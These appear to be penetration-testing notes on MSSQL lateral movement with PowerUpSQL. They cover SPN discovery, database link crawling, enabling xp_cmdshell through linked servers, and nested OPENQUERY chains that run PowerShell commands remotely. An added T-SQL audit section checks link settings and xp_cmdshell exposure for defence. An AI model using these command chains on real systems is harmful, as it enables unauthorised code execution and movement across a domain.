MSSQL Servers
General
Widely deployed in Windows domains
Good option for lateral movement, since domain users and groups can be mapped to database roles
We can use PowerUpSQL for exploitation
Exploitation
Enumeration
# Discovery (SPN Scanning)
Get-SQLInstanceDomain
# Check accessibility
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
# Gather information
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Database Links
A database link allows a SQL Server to access external data sources, such as other SQL Servers and OLE DB data sources
For links between SQL Servers, we can execute stored procedures
Links work across forest trusts
Using PowerUpSQL
# Look for links to remote server
Get-SQLServerLink -Instance dcorp-mssql -Verbose
# Enumerate database links
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
# Execute commands
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'"
Using SQL Queries
/* Enumerate database links */
select * from master..sysservers
/* Run queries on a linked database through OpenQuery() */
select * from openquery("dcorp-sql1", "select * from master..sysservers")
/* Chain queries to access nested links */
select * from openquery("dcorp-sql", 'select * from openquery("dcorp-mgmt", "select * from master..sysservers")')
/* Enable xp_cmdshell on a linked server (requires RPC Out enabled on the link and sysadmin rights on the remote instance) */
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "eu-sql"
/* Execute commands using nested link queries: every level of nesting doubles the embedded double quotes */
select * from openquery("dcorp-sql1", 'select * from openquery("dcorp-mgmt", "select * from openquery(""eu-sql.eu.eurocorp.local"", ""select @@version as version; exec master..xp_cmdshell """"powershell whoami"""""")")')
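Defensive counterpart, added here as an example that is not part of the original page or of PowerUpSQL: a T-SQL audit run on an instance under review that inventories the same link properties the crawl above relies on (RPC Out, data access, and how the link authenticates) and the current xp_cmdshell setting. It uses the catalog views sys.servers, sys.linked_logins, sys.server_principals and sys.configurations; the link name LINK_NAME in the last statement is a placeholder to replace with one of the links the first query returns.

```sql
-- Added audit example (not from the original page). Run as a login with
-- VIEW ANY DEFINITION or sysadmin on the instance being reviewed.

-- 1. Every linked server, whether OPENQUERY and EXECUTE ... AT are possible
--    on it, and which remote identity each local login gets.
SELECT
    s.name                    AS link_name,
    s.data_source,
    s.provider,
    s.is_data_access_enabled,                      -- 1 = OPENQUERY allowed
    s.is_rpc_out_enabled,                          -- 1 = EXECUTE ... AT allowed
    CASE WHEN ll.local_principal_id = 0
         THEN '<all other logins>'                 -- catch-all mapping row
         ELSE sp.name END                          AS local_login,
    CASE WHEN ll.uses_self_credential = 1 THEN 'pass-through (impersonate)'
         WHEN ll.remote_name IS NOT NULL  THEN 'fixed remote login ' + ll.remote_name
         ELSE 'no access' END                      AS remote_auth,
    CASE WHEN s.is_rpc_out_enabled = 1 AND ll.remote_name IS NOT NULL
         THEN 'REVIEW: fixed credential + RPC Out'  -- every mapped login inherits it
         ELSE '' END                               AS finding
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
  ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp
  ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;

-- 2. Is xp_cmdshell (or the related OLE automation surface) enabled here?
--    value_in_use = 1 means the feature is on right now.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'show advanced options');

-- 3. What privilege does a given link grant to the login running this audit?
--    Only works when RPC Out is enabled on the link; LINK_NAME is a placeholder.
EXEC ('SELECT SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin;')
  AT [LINK_NAME];
```

Rows flagged REVIEW are the ones a crawl like Get-SQLServerLinkCrawl profits from most: a fixed remote credential means every local login that can reach the link inherits that credential, and RPC Out lets sp_configure be run through it; step 3 shows whether that inherited identity is sysadmin on the far side. Repeat on each instance the first query points to, since links chain.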